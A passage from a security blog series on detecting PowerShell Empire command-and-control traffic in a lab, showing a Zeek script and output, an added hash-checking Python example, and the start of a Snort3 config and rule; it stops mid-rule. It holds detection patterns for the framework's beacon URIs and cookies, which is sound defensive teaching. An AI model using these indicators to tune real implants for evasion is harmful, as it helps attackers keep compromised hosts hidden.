</div><div><br /></div><div><br /><b>Third, Zeek Scripting <br /></b><br />Now that we have used a signature to detect our Powershell Empire activity, let's get to the more laborious but better way of using Zeek: its scripting capabilities.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"># Define the modules to use</span>
<span style="color: white;">@load base/files/extract</span>
<span style="color: white;">@load base/files/hash</span>
<span style="color: white;">@load base/frameworks/notice</span>
<span style="color: white;">@load base/frameworks/logging</span>
<span style="color: white;">@load base/protocols/conn</span>
<span style="color: white;">@load base/protocols/http</span>
<span style="color: white;">module PSEmpire;</span>
<span style="color: white;">export {</span>
<span style="color: white;"> global hit_count: int = 0;</span>
<span style="color: white;"> global compromised_psempire_hosts: set[addr] = { } &redef &write_expire=7 days;</span>
<span style="color: white;"> global empire_file_names: pattern = /news|admin|process/; </span>
<span style="color: white;"> </span>
<span style="color: white;"> # Setup our notice capabilities</span>
<span style="color: white;"> redef enum Notice::Type += { suspicious_psempire_compromised_host };</span>
<span style="color: white;"> redef Notice::type_suppression_intervals += { [suspicious_psempire_compromised_host] = 1day };</span>
<span style="color: white;"> </span>
<span style="color: white;"> # Setup our own log</span>
<span style="color: white;"> redef enum Log::ID += { PSEmpire::LOG };</span>
<span style="color: white;"> </span>
<span style="color: white;"> option msg = "Say what you want to see"; </span>
<span style="color: white;"> </span>
<span style="color: white;"> # Define the fields for the PSEmpire log records</span>
<span style="color: white;"> type Info: record </span>
<span style="color: white;"> <span> </span>{</span>
<span style="color: white;"> ts: time &log; # Add a timestamp</span>
<span style="color: white;"> src_host: addr &log; # Add the source IP </span>
<span style="color: white;"> src_port: port &log; # Add the source port</span>
<span style="color: white;"> dst_host: addr &log; # Add the destination IP</span>
<span style="color: white;"> dst_port: port &log; # Add the destination port</span>
<span style="color: white;"> msg: string &log; # Add the message info</span>
<span style="color: white;"> <span> </span>}; </span>
<span style="color: white;"> </span>
<span style="color: white;"> }</span>
<span style="color: white;"># Execute this when zeek starts up</span>
<span style="color: white;">event zeek_init()</span>
<span style="color: white;"><span> </span>{</span>
<span style="color: white;"> print "[*] Zeek has started ... ";</span>
<span style="color: white;"> print "[*] Initializing the log stream ... ";</span>
<span style="color: white;"> Log::create_stream(LOG, [$columns=Info, $path="PSEmpire"]);</span>
<span style="color: white;"> print "-----------------------------------------------------"; </span>
<span style="color: white;"> print "[*] Hunting for POWERSHELL EMPIRE Activity ... ";</span>
<span style="color: white;"> print "-----------------------------------------------------";</span>
<span style="color: white;"><span> </span>}</span>
<span style="color: white;"># Check the HTTP Request</span>
<span style="color: white;">event http_request(c: connection, method: string, original_URI: string, unescaped_URI: string, version: string)</span>
<span style="color: white;"><span> </span>{</span>
<span style="color: white;"> # print fmt("[*] HTTP Request structure: METHOD:%s | ORIGINAL_URI:%s | UNESCAPED_URI:%s", method, original_URI, unescaped_URI);</span>
<span style="color: white;"> </span>
<span style="color: white;"> if (c$id$orig_h == 10.0.0.110 && c$id$resp_p == 443/tcp && empire_file_names in original_URI)</span>
<span style="color: white;"><span> </span><span> </span><span> </span>{</span>
<span style="color: white;"> PSEmpire::hit_count += 1;</span>
<span style="color: white;"> print fmt("[*] SUSPICIOUS POWERSHELL EMPIRE ACTIVITY %s:%s -> %s:%s", c$id$orig_h, c$id$orig_p, c$id$resp_h, c$id$resp_p);</span>
<span style="color: white;"> add compromised_psempire_hosts[c$id$orig_h]; </span>
<span style="color: white;"> </span><span style="color: white;"> </span>
<span style="color: white;"> # Write information to our log file</span>
<span style="color: white;"> <span> </span>Log::write(LOG, Info(</span>
<span style="color: white;"> <span> </span>$ts=network_time(),</span>
<span style="color: white;"> <span> </span>$src_host = c$id$orig_h,</span>
<span style="color: white;"> <span> </span>$src_port = c$id$orig_p,</span>
<span style="color: white;"> <span> </span>$dst_host = c$id$resp_h,</span>
<span style="color: white;"> <span> </span>$dst_port = c$id$resp_p,</span>
<span style="color: white;"> <span> </span>$msg = "PowerShell Empire Activity Found!"</span>
<span style="color: white;"> )); </span>
<span style="color: white;"> # Raise our notice</span>
<span style="color: white;"> NOTICE([ </span>
<span style="color: white;"> <span> </span>$note=suspicious_psempire_compromised_host,</span>
<span style="color: white;"> <span> </span>$msg = "SUSPICIOUS POWERSHELL EMPIRE ACTIVITY",</span>
<span style="color: white;"> <span> </span>$sub = "A host is suspected to be infected with Powershell Empire CnC",</span>
<span style="color: white;"> <span> </span>$conn = c,</span>
<span style="color: white;"> <span> </span>$suppress_for = 60min,</span>
<span style="color: white;"> <span> </span>$identifier = cat(c$id$orig_h,c$id$orig_p,c$id$resp_h,c$id$resp_p) </span>
<span style="color: white;"> <span> </span>]);</span>
<span style="color: white;"> }</span>
<span style="color: white;"> }</span>
<span style="color: white;"> </span>
<span style="color: white;"># Get the file Hashes and extract the files</span>
<span style="color: white;">event file_new(f: fa_file) </span>
<span style="color: white;"><span> </span>{</span>
<span style="color: white;"> if (f$source == "HTTP")</span>
<span style="color: white;"> { </span>
<span style="color: white;"><span> </span> <span> </span>for ( cid, cconns in f$conns )</span>
<span style="color: white;"> <span> </span>{</span>
<span style="color: white;"> # print cconns$http$uri;</span>
<span style="color: white;"> if ( empire_file_names in cconns$http$uri && cid$orig_h in compromised_psempire_hosts && cid$resp_h != 10.0.0.110 )</span>
<span style="color: white;"> <span> </span>{</span>
<span style="color: white;"> local f_name = "EMPTY";</span>
<span style="color: white;"> local f_name_array = split_string(cconns$http$uri, /\//); # Split the string by /</span>
<span style="color: white;"> </span>
<span style="color: white;"> if (|f_name_array| == 3)</span>
<span style="color: white;"> <span> </span>f_name = f_name_array[2];</span>
<span style="color: white;"> else</span>
<span style="color: white;"> <span> </span>f_name = f_name_array[1];</span>
<span style="color: white;"> local extracted_filename = fmt("%s-%s-%s", f$source, f$id, f_name );</span>
<span style="color: white;"> print fmt(" \\-> Extracted file: %s", extracted_filename );</span>
<span style="color: white;"> </span>
<span style="color: white;"> # Get the SHA256 Hashes of the files</span>
<span style="color: white;"> Files::add_analyzer(f, Files::ANALYZER_SHA256);</span>
<span style="color: white;"> </span>
<span style="color: white;"> # Extract the file</span>
<span style="color: white;"> Files::add_analyzer(f, Files::ANALYZER_EXTRACT, [$extract_filename=extracted_filename]);</span>
<span style="color: white;"> }</span>
<span style="color: white;"> <span> </span>}</span>
<span style="color: white;"><span> </span>}</span>
<span style="color: white;">}</span>
<span style="color: white;"> </span>
<span style="color: white;"> </span>
<span style="color: white;"> </span>
<span style="color: white;"># Finally some quick code to execute when Zeek ends</span>
<span style="color: white;">event zeek_done()</span>
<span style="color: white;"><span> </span>{</span>
<span style="color: white;"> if ( |PSEmpire::hit_count| == 0 )</span>
<span style="color: white;"><span> </span> <span> </span>{</span>
<span style="color: white;"> print "-----------------------------------------------------";</span>
<span style="color: white;"> print "[*] Lucky you! No PowerShell Empire IoCs found!";</span>
<span style="color: white;"> return;</span>
<span style="color: white;"> <span> </span>}</span>
<span style="color: white;"> </span>
<span style="color: white;"> print "-----------------------------------------------------";</span>
<span style="color: white;"> print fmt("[*] We have %d hits for Powershell related IoCs", PSEmpire::hit_count );</span>
<span style="color: white;"> print fmt("[*] There is/are %d unique IP(s) across the %d hits", |compromised_psempire_hosts|, PSEmpire::hit_count);</span>
<span style="color: white;"> for ( ip in compromised_psempire_hosts )</span>
<span style="color: white;"> <span> </span>{</span>
<span style="color: white;"> print fmt (" \\- %s", ip);</span>
<span style="color: white;"> <span> </span>}</span>
<span style="color: white;"> print "[*] Zeek has ended. :-( ";</span>
<span style="color: white;"> </span>
<span style="color: white;"><span> </span><span> </span>}</span>
</pre></div>
</div><div><br /></div><div><div>When the above code is run, this is what we get on the screen.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[/tmp]</span>
<span style="color: white;">└─$ zeek --readfile /home/securitynik/packets/empire-full-session.pcap --rulefile /home/securitynik/packets/powershell.sig --no-checksums /home/securitynik/packets/psEmpire.zeek </span>
<span style="color: white;">[*] Zeek has started ... </span>
<span style="color: white;">[*] Initializing the log stream ... </span>
<span style="color: white;">-----------------------------------------------------</span>
<span style="color: white;">[*] Hunting for POWERSHELL EMPIRE Activity ... </span>
<span style="color: white;">-----------------------------------------------------</span>
<span style="color: white;">[*] SUSPICIOUS POWERSHELL EMPIRE ACTIVITY 10.0.0.110:1650/tcp -> 10.0.0.107:443/tcp</span>
<span style="color: white;"> \-> Extracted file: HTTP-FJAtZe4W1F6uRwvmM3-news.php</span>
<span style="color: white;">[*] SUSPICIOUS POWERSHELL EMPIRE ACTIVITY 10.0.0.110:1650/tcp -> 10.0.0.107:443/tcp</span>
<span style="color: white;"> \-> Extracted file: HTTP-FbbFCu4T8l288RA3R7-news.php</span>
<span style="color: white;"> \-> Extracted file: HTTP-FIWqGKoACo24S6dS8-news.php</span>
<span style="color: white;">[*] SUSPICIOUS POWERSHELL EMPIRE ACTIVITY 10.0.0.110:1650/tcp -> 10.0.0.107:443/tcp</span>
<span style="color: white;"> \-> Extracted file: HTTP-F4wiHG1bpwW03v71vh-news.php</span>
<span style="color: white;"> \-> Extracted file: HTTP-FghBlt1qKU0utYSHd7-news.php</span>
<span style="color: white;">...</span>
<span style="color: white;">-----------------------------------------------------</span>
<span style="color: white;">[*] We have 1807 hits for Powershell related IoCs</span>
<span style="color: white;">[*] There is/are 1 unique IP(s) across the 1807 hits</span>
<span style="color: white;"> \- 10.0.0.110</span>
<span style="color: white;">[*] Zeek has ended. :-( </span>
</pre></div>
</div> <div><div>Notice above it says we extracted the files. Let's verify that by using ls on the <i>extract_files</i> folder.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[/tmp]</span>
<span style="color: white;">└─$ ls extract_files/</span>
<span style="color: white;">HTTP-F04ExA4j0mLQtMJfxd-get.php HTTP-Fesf2Y3CmRhWycz7Pf-process.php HTTP-Fp6Yax4DsWlpbttqR6-news.php</span>
<span style="color: white;">HTTP-F04Fi9X4phawyMEXl-news.php HTTP-FeshuKrFfyOgA6uH5-process.php HTTP-FPCjffBSpvM3iS48f-process.php</span>
<span style="color: white;">HTTP-F05oktdIUrPchmqg-news.php HTTP-FEskgT2JF9cCFwnBcf-get.php HTTP-FpcYVS1xKGD4yv2rCb-get.php</span>
<span style="color: white;">HTTP-F05vS52MRDIDb1BIyi-process.php HTTP-Festcg1mUFuQygmVe-get.php HTTP-FPeqrG4Ur8DlkjgYv4-process.php</span>
<span style="color: white;">....</span>
</pre></div>
</div><div><br /></div><div><div>Looks good!<br /><br /></div></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[/tmp]</span>
<span style="color: white;">└─$ zeek-cut -d ts fuid tx_hosts rx_hosts conn_uids source filename sha256 < files.log | more</span>
<span style="color: white;">2021-11-20T13:03:59-0500 FJAtZe4W1F6uRwvmM3 10.0.0.107 10.0.0.110 CjvLUV2ZfpZGgNfiHj HTTP - 41ab2b2d10eb9fdcf1d667ec4f45db99ec1761c06a4e2d61a789710fb0c08a04</span>
<span style="color: white;">2021-11-20T13:04:02-0500 FbbFCu4T8l288RA3R7 10.0.0.110 10.0.0.107 CjvLUV2ZfpZGgNfiHj HTTP - bf896ec20bad0ee772db7ea44b6bf45c2b7401687808bf8474591f0e1612b01c</span>
<span style="color: white;">2021-11-20T13:04:02-0500 FIWqGKoACo24S6dS8 10.0.0.107 10.0.0.110 CjvLUV2ZfpZGgNfiHj HTTP - 600df9d2f01f3388e2154bfacc557b6add77cddce147b1cdebc30ad188b57edb</span>
</pre></div>
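<div>As an added example (not code from the post or from Zeek), the following Python checks every file in <i>extract_files</i> against the sha256 column of files.log, so a file whose hash no longer matches, or one that files.log never recorded, stands out before anyone opens it. It assumes the source-fuid-name pattern the script above builds (e.g. HTTP-FJAtZe4W1F6uRwvmM3-news.php); the sample files.log and the files it covers are constructed inline.</div>

```python
"""Check the files Zeek extracted against the SHA256 values in files.log.

Added example, not code from the post or from Zeek. It assumes the extracted
file names follow the "<source>-<fuid>-<name>" pattern the script above builds,
and that files.log is a standard tab-separated Zeek log with a "#fields" line.
"""
import hashlib
import os
import tempfile


def parse_zeek_log(text):
    """Parse Zeek TSV log text into a list of dicts keyed by the #fields names."""
    fields = None
    rows = []
    for line in text.splitlines():
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
        elif line.startswith("#") or not line.strip():
            continue  # #separator, #types, #close and blank lines
        else:
            values = line.split("\t")
            if fields is None or len(values) != len(fields):
                raise ValueError("malformed log line: %r" % line)
            rows.append(dict(zip(fields, values)))
    return rows


def fuid_from_extracted_name(name):
    """'HTTP-FJAtZe4W1F6uRwvmM3-news.php' -> 'FJAtZe4W1F6uRwvmM3'."""
    parts = name.split("-", 2)
    return parts[1] if len(parts) == 3 else None


def sha256_of_file(path):
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_extracted_files(files_log_text, extract_dir):
    """Map each extracted file to 'ok', 'mismatch', 'no_hash' or 'unknown_fuid'."""
    by_fuid = {row["fuid"]: row for row in parse_zeek_log(files_log_text)}
    results = {}
    for name in sorted(os.listdir(extract_dir)):
        row = by_fuid.get(fuid_from_extracted_name(name))
        if row is None:
            results[name] = "unknown_fuid"     # files.log has no record of it
            continue
        logged = row.get("sha256", "-")
        if logged == "-":                      # ANALYZER_SHA256 never ran on it
            results[name] = "no_hash"
            continue
        actual = sha256_of_file(os.path.join(extract_dir, name))
        results[name] = "ok" if actual == logged else "mismatch"
    return results


def build_demo():
    """Constructed sample: two logged files (one modified after extraction) and
    one stray file that files.log never mentions."""
    extract_dir = tempfile.mkdtemp(prefix="extract_files_")
    payloads = {
        "HTTP-Fdemo0000000000001-news.php": b"<html>constructed beacon reply</html>",
        "HTTP-Fdemo0000000000002-news.php": b"constructed tasking response",
    }
    rows = []
    for name, data in payloads.items():
        with open(os.path.join(extract_dir, name), "wb") as fh:
            fh.write(data)
        rows.append("1637431439.632367\t%s\tHTTP\t-\t%s"
                    % (fuid_from_extracted_name(name), hashlib.sha256(data).hexdigest()))
    files_log = ("#separator \\x09\n"
                 "#fields\tts\tfuid\tsource\tfilename\tsha256\n"
                 "#types\ttime\tstring\tstring\tstring\tstring\n"
                 + "\n".join(rows) + "\n#close\t2021-11-20-13-10-00\n")
    # Modify one file after the log was written, and drop in an unlogged file
    with open(os.path.join(extract_dir, "HTTP-Fdemo0000000000002-news.php"), "ab") as fh:
        fh.write(b"!")
    with open(os.path.join(extract_dir, "HTTP-Fdemo0000000000003-get.php"), "wb") as fh:
        fh.write(b"stray")
    return verify_extracted_files(files_log, extract_dir)


if __name__ == "__main__":
    for name, status in build_demo().items():
        print("%-40s %s" % (name, status))
```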
</div><div><br /></div><div>Looking at our custom log file, PSEmpire.log.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[/tmp]</span>
<span style="color: white;">└─$ zeek-cut -d -m < PSEmpire.log | more </span>
<span style="color: white;">ts src_host src_port dst_host dst_port msg</span>
<span style="color: white;">2021-11-20T13:03:59-0500 10.0.0.110 1650 10.0.0.107 443 PowerShell Empire Activity Found!</span>
<span style="color: white;">2021-11-20T13:04:02-0500 10.0.0.110 1650 10.0.0.107 443 PowerShell Empire Activity Found!</span>
<span style="color: white;">2021-11-20T13:04:03-0500 10.0.0.110 1650 10.0.0.107 443 PowerShell Empire Activity Found!</span>
<span style="color: white;">2021-11-20T13:05:06-0500 10.0.0.110 1650 10.0.0.107 443 PowerShell Empire Activity Found!</span>
<span style="color: white;">2021-11-20T13:06:06-0500 10.0.0.110 1650 10.0.0.107 443 PowerShell Empire Activity Found!</span>
<span style="color: white;">2021-11-20T13:07:06-0500 10.0.0.110 1650 10.0.0.107 443 PowerShell Empire Activity Found!</span>
<span style="color: white;">2021-11-20T13:08:07-0500 10.0.0.110 1650 10.0.0.107 443 PowerShell Empire Activity Found!</span>
<span style="color: white;">2021-11-20T13:09:07-0500 10.0.0.110 1650 10.0.0.107 443 PowerShell Empire Activity Found!</span>
</pre></div>
</div><div><br /></div><div><br /></div><div>Well, that's it for this post and this series.<br /><br /></div><div><p><b>Other posts in this series:</b><br /></p><p><a href="https://www.securitynik.com/2022/02/beginning-powershell-empire-attack-in.html" target="_blank">Beginning Powershell Empire - The Attack in 10 steps</a><br /><a href="Beginning PowerShell Empire - Log Analysis" target="_blank">Powershell Empire Log Analysis</a><br /><a href="https://www.securitynik.com/2022/02/beginning-powershell-empire-packet.html" target="_blank">Powershell Empire Packet Analysis</a><br /><a href="https://www.securitynik.com/2022/02/powershell-empire-detection-with-snort3.html" target="_blank">Powershell Empire Detection with Snort</a><br /><a href="https://www.securitynik.com/2022/02/powershell-empire-detection-with-zeek.html" target="_blank">Powershell Empire - Detection with Zeek</a></p><br /><br /></div><div><br /></div><div><div>References:</div><div><a href="https://zeek.org/2020/06/08/7-dos-and-donts-for-zeek-scripting/">https://zeek.org/2020/06/08/7-dos-and-donts-for-zeek-scripting/</a></div><div><a href="https://old.zeek.org/brocon2018/slides/Aashish_Sharma.pdf">https://old.zeek.org/brocon2018/slides/Aashish_Sharma.pdf</a></div><div><a href="https://docs.zeek.org/en/master/logs/conn.html">https://docs.zeek.org/en/master/logs/conn.html</a></div><div><a href="https://docs.zeek.org/en/master/logs/files.html">https://docs.zeek.org/en/master/logs/files.html</a></div><div><a href="https://docs.zeek.org/en/master/frameworks/signatures.html">https://docs.zeek.org/en/master/frameworks/signatures.html</a></div><div><a href="https://sansorg.egnyte.com/dl/8VIrX1K87d/?">https://sansorg.egnyte.com/dl/8VIrX1K87d/?</a></div><div><a href="https://docs.zeek.org/en/master/frameworks/notice.html">https://docs.zeek.org/en/master/frameworks/notice.html</a></div><div><a 
href="http://ce.sc.edu/cyberinfra/docs/workshop/Bro%20Intrusion%20Detection%20System%20(IDS).pdf">http://ce.sc.edu/cyberinfra/docs/workshop/Bro%20Intrusion%20Detection%20System%20(IDS).pdf</a></div><div><a href="http://ce.sc.edu/cyberinfra/workshops/Material/Zeek/Lab%206.pdf">http://ce.sc.edu/cyberinfra/workshops/Material/Zeek/Lab%206.pdf</a></div><div><a href="https://www.youtube.com/watch?v=XXGVi2JF-v0">https://www.youtube.com/watch?v=XXGVi2JF-v0</a></div></div><div><br /></div><div><br /></div><div><br /></div></div><div><b>Powershell Empire - Detection with Snort3</b> (published 2022-02-02)</div><div>Do keep in mind that, as I write these rules, this is basically from a learning perspective. Putting these into production does not mean you will have the same detection, primarily because these values can be changed by the threat actor, resulting in evasion of your IDS/IPS. This is being done primarily from my lab's perspective.</div><div><br /></div><div>First, verifying the version of Snort being used.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(root💀securitynik)-[~/snort-files/snort3-3.1.18.0/build]</span>
<span style="color: white;">└─# snort --version </span>
<span style="color: white;"> ,,_ -*> Snort++ <*-</span>
<span style="color: white;"> o" )~ Version 3.1.18.0</span>
<span style="color: white;"> '''' By Martin Roesch & The Snort Team</span>
<span style="color: white;"> http://snort.org/contact#team</span>
<span style="color: white;"> Copyright (C) 2014-2021 Cisco and/or its affiliates. All rights reserved.</span>
<span style="color: white;"> Copyright (C) 1998-2013 Sourcefire, Inc., et al.</span>
<span style="color: white;"> Using DAQ version 3.0.5</span>
<span style="color: white;"> Using LuaJIT version 2.1.0-beta3</span>
<span style="color: white;"> Using OpenSSL 1.1.1l 24 Aug 2021</span>
<span style="color: white;"> Using libpcap version 1.10.1 (with TPACKET_V3)</span>
<span style="color: white;"> Using PCRE version 8.44 2020-02-12</span>
<span style="color: white;"> Using ZLIB version 1.2.11</span>
<span style="color: white;"> Using FlatBuffers 2.0.5</span>
<span style="color: white;"> Using Hyperscan version 5.4.0 2021-12-11</span>
<span style="color: white;"> Using LZMA version 5.2.5</span>
</pre></div>
</div><div><br /></div><div><div>Creating my configuration file (<i>snort.lua</i>) and rule file (<i>local.rules</i>) to use for this post.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(root💀securitynik)-[~/packets]</span>
<span style="color: white;">└─# touch snort.lua && touch local.rules</span>
</pre></div>
</div><div><br /></div><div>Testing the configuration and rule file, along with some of the command line options I will be using.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(root💀securitynik)-[~/packets]</span>
<span style="color: white;">└─# snort --pcap-list empire-full-session.pcap -A cmg --tweaks talos --pcap-show -k none -d -R local.rules -v -c snort.lua --daq pcap -T</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">o")~ Snort++ 3.1.18.0</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">Loading snort.lua:</span>
<span style="color: white;"> hosts</span>
<span style="color: white;"> host_cache</span>
<span style="color: white;"> active</span>
<span style="color: white;"> packets</span>
<span style="color: white;"> decode</span>
<span style="color: white;"> so_proxy</span>
<span style="color: white;"> trace</span>
<span style="color: white;"> search_engine</span>
<span style="color: white;"> process</span>
<span style="color: white;"> network</span>
<span style="color: white;"> host_tracker</span>
<span style="color: white;"> output</span>
<span style="color: white;"> daq</span>
<span style="color: white;"> alerts</span>
<span style="color: white;">Finished snort.lua:</span>
<span style="color: white;">Loading rule args:</span>
<span style="color: white;">Loading local.rules:</span>
<span style="color: white;">Finished local.rules:</span>
<span style="color: white;">Finished rule args:</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">Network Policy : policy id 0 : snort.lua</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">Inspection Policy : policy id 0 : snort.lua</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">so_proxy:</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">pcap DAQ configured to read-file.</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">host_cache</span>
<span style="color: white;"> memcap: 8388608 bytes</span>
<b><span style="color: #fcff01;"><span>Snort successfully validated the configuration (with 0 warnings).</span>
</span></b><span style="color: white;">o")~ Snort exiting</span>
</pre></div>
</div><div><br /></div><div>Ok, rather than continuing to learn more about Snort, let's jump right into our configuration file and the rules. See one of my <a href="https://www.securitynik.com/2021/02/snort3-on-ubuntu-20-initial-setup.html" target="_blank">previous blogs</a> on building Snort3. I will add comments to <i>snort.lua</i> and <i>local.rules</i> to ensure we understand what my rules are doing. Additionally, I will take advantage of both the service rules and the traditional Snort2 rule structure.</div><div><div><br /></div><div>Some things to keep in mind when writing rules: focus on the vulnerability, not the exploit. Focus on what you have control over, not what the attackers do. Focus on what is leaving your network more than what is entering it.</div><div><br /></div><div>Let's go!</div><div><br /></div><div>Here is the custom <i>snort.lua</i> configuration file I am using.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">-- take advantage of Snort3 defaults</span>
<span style="color: white;">include '/usr/local/etc/snort/snort_defaults.lua' </span>
<span style="color: white;">-- take advantage of snort default classifications</span>
<span style="color: white;">classifications = default_classifications</span>
<span style="color: white;">-- Tell Snort3 what is our protected network so it can monitor it.</span>
<span style="color: white;">HOME_NET = [[10.0.0.110/32]]</span>
<span style="color: white;">-- This represents every network other than our protected network </span>
<span style="color: white;">EXTERNAL_NET = '!$HOME_NET'</span>
<span style="color: white;">local_variables = </span>
<span style="color: white;"> {</span>
<span style="color: white;"> nets = </span>
<span style="color: white;"><span> <span> </span></span>{</span>
<span style="color: white;"> <span> </span>HOME_NET = HOME_NET,</span>
<span style="color: white;"> <span> </span>EXTERNAL_NET = EXTERNAL_NET,</span>
<span style="color: white;"> }</span>
<span style="color: white;"> }</span>
<span style="color: white;"> </span>
<span style="color: white;"> </span>
<span style="color: white;">ips = </span>
<span style="color: white;"> {</span>
<span style="color: white;"> <span> </span>variables = local_variables</span>
<span style="color: white;"> } </span>
<span style="color: white;"> </span>
<span style="color: white;"> </span>
<span style="color: white;">-- Be able to profile the activities, get statistics</span>
<span style="color: white;">profiler = { }</span>
<span style="color: white;">-- Enable the Stream Inspector</span>
<span style="color: white;">stream = { }</span>
<span style="color: white;">-- Reassemble IP</span>
<span style="color: white;">stream_ip = { </span>
<span style="color: white;"> policy = "windows";</span>
<span style="color: white;"> }</span>
<span style="color: white;">-- Reassemble TCP</span>
<span style="color: white;">stream_tcp = {</span>
<span style="color: white;"> policy = "windows";</span>
<span style="color: white;"> require_3whs = 300;</span>
<span style="color: white;"> track_only = false;</span>
<span style="color: white;"> }</span>
<span style="color: white;"> </span>
<span style="color: white;"> </span>
<span style="color: white;">-- setup a binder</span>
<span style="color: white;">wizard = default_wizard</span>
<span style="color: white;">binder = </span>
<span style="color: white;"> {</span>
<span style="color: white;"> <span> </span>{ when = { proto = 'tcp', ports = [[80 443]] }, use = { type = 'http_inspect' } },</span>
<span style="color: white;"> <span> </span>{ when = { service = 'http' }, use = { type = 'http_inspect' } }, </span>
<span style="color: white;"> <span> </span>{ use = { type = 'wizard' } }, </span>
<span style="color: white;"> }</span>
<span style="color: white;"> </span>
<span style="color: white;">-- Define the HTTP inspector</span>
<span style="color: white;">http_inspect = { }</span>
<span style="color: white;"> </span>
<span style="color: white;">event_filter =</span>
<span style="color: white;">{</span>
<span style="color: white;">-- alerts once per 60 seconds then ignore any additional events during the 60 seconds.</span>
<span style="color: white;"> { gid = 1, sid = 4000001, type = 'both', track = 'by_src', count = 1, seconds = 60},</span>
<span style="color: white;"> { gid = 1, sid = 4000002, type = 'both', track = 'by_src', count = 1, seconds = 60},</span>
<span style="color: white;"> { gid = 1, sid = 4000003, type = 'both', track = 'by_src', count = 1, seconds = 60},</span>
<span style="color: white;"> { gid = 1, sid = 4000004, type = 'both', track = 'by_src', count = 1, seconds = 60},</span>
<span style="color: white;"> </span>
<span style="color: white;">}</span>
</pre></div>
</div><div><br /></div><div>Below represents the contents of my local.rules file after the first rule is developed.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">alert tcp $HOME_NET any -> $EXTERNAL_NET 443</span>
<span style="color: white;"><span> </span>(</span>
<span style="color: white;"> rem: "This rule is looking for Powershell Empire /news.php, hence the 'msg' option";</span>
<span style="color: white;"> msg: "POWERSHELL EMPIRE COMPROMISED HOST: GET request made for /news.php detected";</span>
<span style="color: white;"> </span>
<span style="color: white;"><span> <span> </span></span>rem: "Looking for HTTP method GET. Using the Hex values instead of the string in the first 3 bytes of the payload";</span>
<span style="color: white;"> http_method; </span>
<span style="color: white;"> content: "|47 45 54|", offset 0, depth 3;</span>
<span style="color: white;"> </span>
<span style="color: white;"> rem: "find the string /news.php in the path. ";</span>
<span style="color: white;"> http_uri: path;</span>
<span style="color: white;"> content: "/news.php", distance 0, within 9, nocase; </span>
<span style="color: white;"> </span>
<span style="color: white;"> rem: "Looking for HTTP Version 1.1";</span>
<span style="color: white;"> http_version: request;</span>
<span style="color: white;"> content: "1.1";</span>
<span style="color: white;"> </span>
<span style="color: white;"> rem: "Look in the HTTP header for Connection: Keep-Alive";</span>
<span style="color: white;"> http_header: field Connection;</span>
<span style="color: white;"> content: "Keep-Alive", nocase;</span>
<span style="color: white;"> </span>
<span style="color: white;"> rem: "Also look for a cookie that ends with '=', suggesting base64 encoded content";</span>
<span style="color: white;"> http_header: field Cookie;</span>
<span style="color: white;"> regex: "/.*=$/i";</span>
<span style="color: white;"> </span>
<span style="color: white;"> classtype: malware-cnc; </span>
